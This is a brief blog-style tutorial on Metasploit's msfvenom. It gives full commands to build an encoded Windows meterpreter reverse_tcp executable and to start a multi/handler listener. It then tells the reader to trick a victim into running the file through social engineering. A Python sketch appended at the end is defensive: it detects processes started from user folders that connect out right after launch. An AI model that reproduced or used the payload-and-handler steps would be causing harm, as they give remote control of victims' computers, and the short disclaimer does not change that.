MSFVenom
Disclaimer: This post is for research and educational purposes only. I do not take any responsibility, in regards to the actions taken by the readers of this article. Never attempt to hack a device for which you do not have the required permissions to do so.
This guide covers how to use msfvenom.
What is msfvenom?
The Metasploit Framework has included tools like msfpayload and msfencode for quite some time. These tools can be used to generate various types of payloads and encode them with various encoder modules. The tool msfvenom combines the functionality of msfpayload and msfencode into one.
It standardizes the command line options and makes it easier to generate payloads and encode them.
How to use msfvenom
To see all the payloads msfvenom offers, you can do:
$ msfvenom -l payloads
This lists the available payloads that can be generated by msfvenom.
To see all the encoders msfvenom offers, you can do:
$ msfvenom -l encoders
This lists the available encoders that can be used.
To generate a payload, you can do:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.254.192 LPORT=8080 -f exe -e cmd/powershell_base64 -o ~/payload.exe
This generates a reverse_tcp payload in exe format with powershell_base64 encoding and writes it to the file payload.exe.
Now we have to set up a handler to listen for the payload and attempt to open a meterpreter session on the victim’s computer.
$ msfconsole
This will open the Metasploit Framework Console.
To set up the handler, you can do:
msf5> use exploit/multi/handler
msf5> set PAYLOAD windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.254.192
msf5> set LPORT 8080
msf5> exploit
This will start the handler that listens for the payload that we created earlier.
Now we have to get the victim to execute the malicious file that we created earlier, using our social engineering skills, and that should provide us with a meterpreter session.
Hack Complete.
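The reverse_tcp flow described above leaves a recognisable trace on the endpoint: a binary started from a user-writable path that opens an outbound connection within seconds. A detection sketch for that pattern, as an added example that is not part of the original post; the events are constructed and only loosely modelled on Sysmon Event ID 1 (process creation) and Event ID 3 (network connection), and the victim-side paths, field names and the function name `find_reverse_connects` are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). "id" 1 = process creation,
# "id" 3 = network connection, following Sysmon's event numbering.
EVENTS = [
    {"id": 1, "time": "2024-01-10T09:00:00", "pid": 4120,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "time": "2024-01-10T09:00:02", "pid": 4120,
     "dst_ip": "203.0.113.10", "dst_port": 443, "initiated": True},
    {"id": 1, "time": "2024-01-10T09:05:00", "pid": 5308,
     "image": r"C:\Users\alice\Downloads\payload.exe"},
    {"id": 3, "time": "2024-01-10T09:05:01", "pid": 5308,
     "dst_ip": "192.168.254.192", "dst_port": 8080, "initiated": True},
    {"id": 1, "time": "2024-01-10T09:10:00", "pid": 6001,
     "image": r"C:\Users\alice\AppData\Local\Temp\setup.exe"},
    {"id": 3, "time": "2024-01-10T09:20:00", "pid": 6001,
     "dst_ip": "10.0.0.5", "dst_port": 443, "initiated": True},
]

# Path fragments treated as user-writable (assumed list; tune per environment).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")
WINDOW = timedelta(seconds=30)  # assumed correlation window


def find_reverse_connects(events, window=WINDOW):
    """Flag processes launched from user-writable paths that initiate an
    outbound connection within `window` of starting."""
    started = {}  # pid -> (start time, image); PID reuse is ignored here
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 1:
            started[ev["pid"]] = (ts, ev["image"])
        elif ev["id"] == 3 and ev.get("initiated") and ev["pid"] in started:
            t0, image = started[ev["pid"]]
            from_writable = any(p in image.lower() for p in USER_WRITABLE)
            if from_writable and ts - t0 <= window:
                alerts.append((image, ev["dst_ip"], ev["dst_port"]))
    return alerts


if __name__ == "__main__":
    for image, ip, port in find_reverse_connects(EVENTS):
        print(f"ALERT: {image} connected to {ip}:{port} right after launch")
```

The browser is skipped because of its install path, and setup.exe because its connection falls outside the window; only the Downloads binary connecting to the handler address is reported.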